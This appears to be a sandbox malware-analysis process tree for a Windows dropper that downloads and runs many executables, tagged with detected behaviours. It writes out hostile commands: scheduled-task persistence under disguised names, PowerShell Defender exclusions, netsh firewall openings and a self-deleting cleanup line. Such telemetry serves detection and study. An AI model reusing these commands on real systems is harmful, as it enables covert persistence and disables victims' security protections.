    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3472 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 2388 -prefMapHandle 3744 -prefsLen 33037 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e802086-f0fa-4e92-a387-e5bb1d1af3e1} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" utility
    3⤵
    - Checks processor information in registry
    PID:2072

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2080
- C:\Users\Admin\Desktop\Files\NVIDIAS.exe
  "C:\Users\Admin\Desktop\Files\NVIDIAS.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5692
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 1188
    3⤵
    - Program crash
    PID:2328
- C:\Users\Admin\Desktop\Files\Discord3.exe
  "C:\Users\Admin\Desktop\Files\Discord3.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3132
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC65E.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:724
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1912
  - - C:\Users\Admin\AppData\Roaming\Discord.exe
      "C:\Users\Admin\AppData\Roaming\Discord.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3912
- C:\Users\Admin\Desktop\Files\pothjadwtrgh.exe
  "C:\Users\Admin\Desktop\Files\pothjadwtrgh.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3004
- C:\Users\Admin\Desktop\Files\k360.exe
  "C:\Users\Admin\Desktop\Files\k360.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:1100
- C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:4844
- C:\Users\Admin\Desktop\Files\r2.exe
  "C:\Users\Admin\Desktop\Files\r2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1800
- C:\Users\Admin\Desktop\Files\imagelogger.exe
  "C:\Users\Admin\Desktop\Files\imagelogger.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  PID:3116
- C:\Users\Admin\Desktop\Files\dmshell.exe
  "C:\Users\Admin\Desktop\Files\dmshell.exe"
  2⤵
  - Executes dropped EXE
  PID:1740
- - C:\Windows\SYSTEM32\cmd.exe
    cmd
    3⤵
    PID:5620
- C:\Users\Admin\Desktop\Files\cdb.exe
  "C:\Users\Admin\Desktop\Files\cdb.exe"
  2⤵
  - Executes dropped EXE
  PID:4796
- C:\Users\Admin\Desktop\Files\svchost.exe
  "C:\Users\Admin\Desktop\Files\svchost.exe"
  2⤵
  PID:2832
- C:\Users\Admin\Desktop\Files\jerniuiopu.exe
  "C:\Users\Admin\Desktop\Files\jerniuiopu.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1952
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\jerniuiopu.exe" /rl HIGHEST /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1104
- C:\Users\Admin\Desktop\Files\msedge..exe
  "C:\Users\Admin\Desktop\Files\msedge..exe"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\msedge..exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge..exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6724
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"
    3⤵
    PID:7028
- C:\Users\Admin\Desktop\Files\testingg.exe
  "C:\Users\Admin\Desktop\Files\testingg.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:484
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    - Drops startup file
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:5284
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:5968
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1548
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4736
- C:\Users\Admin\Desktop\Files\1434orz.exe
  "C:\Users\Admin\Desktop\Files\1434orz.exe"
  2⤵
  PID:1104
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3780
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3884
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3156
- C:\Users\Admin\Desktop\Files\QGFQTHIU.exe
  "C:\Users\Admin\Desktop\Files\QGFQTHIU.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2360
- - C:\Windows\TEMP\{BAC019FC-4CC1-4514-A9ED-93FA0B98AA4B}\.cr\QGFQTHIU.exe
    "C:\Windows\TEMP\{BAC019FC-4CC1-4514-A9ED-93FA0B98AA4B}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\Desktop\Files\QGFQTHIU.exe" -burn.filehandle.attached=696 -burn.filehandle.self=700
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3108
  - - C:\Windows\TEMP\{8AE31A4D-2A5D-4CAA-AE57-C8CEC3DCA737}\.ba\msn.exe
      C:\Windows\TEMP\{8AE31A4D-2A5D-4CAA-AE57-C8CEC3DCA737}\.ba\msn.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:2408
    - - C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
        
        C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
        5⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:1144
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:6208
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:7796
- C:\Users\Admin\Desktop\Files\ZubovLekciya.exe
  "C:\Users\Admin\Desktop\Files\ZubovLekciya.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3048
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\BlockcomrefDhcp\agAs.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\BlockcomrefDhcp\S2T1AGYKXgcDSNksLldDNBs6NjAKZe1cJh6wFjebTHbD.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:6904
    - - C:\BlockcomrefDhcp\Portcrt.exe
        
        "C:\BlockcomrefDhcp/Portcrt.exe"
        5⤵
        Drops file in Program Files directory
        Modifies registry class
        
        PID:6436
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0qq3iTrcfa.bat"
        6⤵
        
        PID:3500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4744
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        
        PID:6308
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        7⤵
        Modifies registry class
        
        PID:7896
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\L4pr7KvdK9.bat"
        8⤵
        
        PID:7296
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:7300
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:4236
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        9⤵
        
        PID:8152
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0OmuZz5KLX.bat"
        10⤵
        
        PID:6192
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:7436
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7764
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        11⤵
        Modifies registry class
        
        PID:128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\O68ilSTvi1.bat"
        12⤵
        
        PID:7716
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:7544
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:8068
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        13⤵
        
        PID:7160
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dlM0lquDlv.bat"
        14⤵
        
        PID:2148
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:7476
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7040
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        15⤵
        
        PID:7156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7laNmMQDQm.bat"
        16⤵
        
        PID:3636
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:6876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        
        PID:6660
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        17⤵
        
        PID:432
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RVEN4vvioM.bat"
        18⤵
        
        PID:6244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:5824
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:7868
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:7196
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        19⤵
        
        PID:5396
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\s2nU7uS06N.bat"
        20⤵
        
        PID:7396
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:1340
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:6984
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        21⤵
        
        PID:8080
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VQkrGeCZky.bat"
        22⤵
        
        PID:3576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:7976
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:2836
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        23⤵
        
        PID:6348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\czppXKEUSU.bat"
        24⤵
        
        PID:7132
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:2464
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:6748
        
        C:\BlockcomrefDhcp\shost.exe
        
        "C:\BlockcomrefDhcp\shost.exe"
        25⤵
        
        PID:8144
- C:\Users\Admin\Desktop\Files\njrtdhadawt.exe
  "C:\Users\Admin\Desktop\Files\njrtdhadawt.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID:6432
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\FBFHDBKJEGHJ" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8100
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:7528
- C:\Users\Admin\Desktop\Files\compiled.exe
  "C:\Users\Admin\Desktop\Files\compiled.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7792
- - C:\Users\Admin\Desktop\Files\compiled.exe
    "C:\Users\Admin\Desktop\Files\compiled.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6216
- C:\Users\Admin\Desktop\Files\33.exe
  "C:\Users\Admin\Desktop\Files\33.exe"
  2⤵
  PID:8044
- C:\Users\Admin\Desktop\Files\discord.exe
  "C:\Users\Admin\Desktop\Files\discord.exe"
  2⤵
  PID:6764
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7364
- - C:\Windows\system32\SubDir\main-pc.exe
    "C:\Windows\system32\SubDir\main-pc.exe"
    3⤵
    PID:7420
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1508
- C:\Users\Admin\Desktop\Files\Prototype.exe
  "C:\Users\Admin\Desktop\Files\Prototype.exe"
  2⤵
  PID:7228

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4560

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:896
- C:\Users\Admin\Desktop\Files\Agentnov.exe
  "C:\Users\Admin\Desktop\Files\Agentnov.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4864
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ComfontwinCrtMonitor\Ay6NG0F6W31r02DmYDfvXlcoXOiJ0g7CZGFgavsjaHVxbb7p79qA9PCcolLF.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ComfontwinCrtMonitor\OnzNiMkRKunjlA2ZJK8bvmP0uahZr4XmUT5IbmeTTuY8hxSaQt1L4to.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2400
    - - C:\Users\Admin\AppData\Roaming\ComfontwinCrtMonitor\WinIntoruntime.exe
        
        "C:\Users\Admin\AppData\Roaming\ComfontwinCrtMonitor/WinIntoruntime.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b6yAW7WG5F.bat"
        6⤵
        
        PID:5620
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        7⤵
        Executes dropped EXE
        
        PID:2632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NuTuzs6IaN.bat"
        8⤵
        
        PID:5976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5116
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\M7ZRnUVt3i.bat"
        10⤵
        
        PID:3336
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:4976
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        11⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jyswAWn9wk.bat"
        12⤵
        
        PID:2012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:716
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2628
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\alQR4bHbbG.bat"
        14⤵
        
        PID:5448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:2108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        Runs ping.exe
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        15⤵
        Executes dropped EXE
        
        PID:1872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pQfj5ziueB.bat"
        16⤵
        
        PID:4380
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:1308
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        Runs ping.exe
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        17⤵
        Executes dropped EXE
        
        PID:5696
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E7ZnFR4Wgx.bat"
        18⤵
        
        PID:5116
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:3488
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        19⤵
        Executes dropped EXE
        
        PID:4616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k4B7WkvJxo.bat"
        20⤵
        
        PID:3968
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:5580
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        21⤵
        Executes dropped EXE
        
        PID:2208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KcXus5bWRf.bat"
        22⤵
        
        PID:5816
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:1440
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        23⤵
        Executes dropped EXE
        
        PID:4668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tI0tYXMWWV.bat"
        24⤵
        
        PID:4704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:5256
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        25⤵
        Executes dropped EXE
        
        PID:4244
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MTZEhVhqv7.bat"
        26⤵
        
        PID:3616
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:1044
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        27⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        27⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5612
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LDMoGsnKVz.bat"
        28⤵
        
        PID:716
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:2632
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        29⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        29⤵
        Executes dropped EXE
        
        PID:1176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aRcytkisn9.bat"
        30⤵
        
        PID:1548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:1228
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        31⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DoC45cXmCX.bat"
        32⤵
        
        PID:1340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:1104
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        33⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        33⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:724
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4evtisdSvL.bat"
        34⤵
        
        PID:1000
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:2436
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        35⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        35⤵
        
        PID:4540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FfDOv2d6gz.bat"
        36⤵
        
        PID:5532
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:3272
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        37⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        37⤵
        Modifies registry class
        
        PID:1636
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zgE5oxkNwR.bat"
        38⤵
        
        PID:5436
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:5632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        39⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        39⤵
        
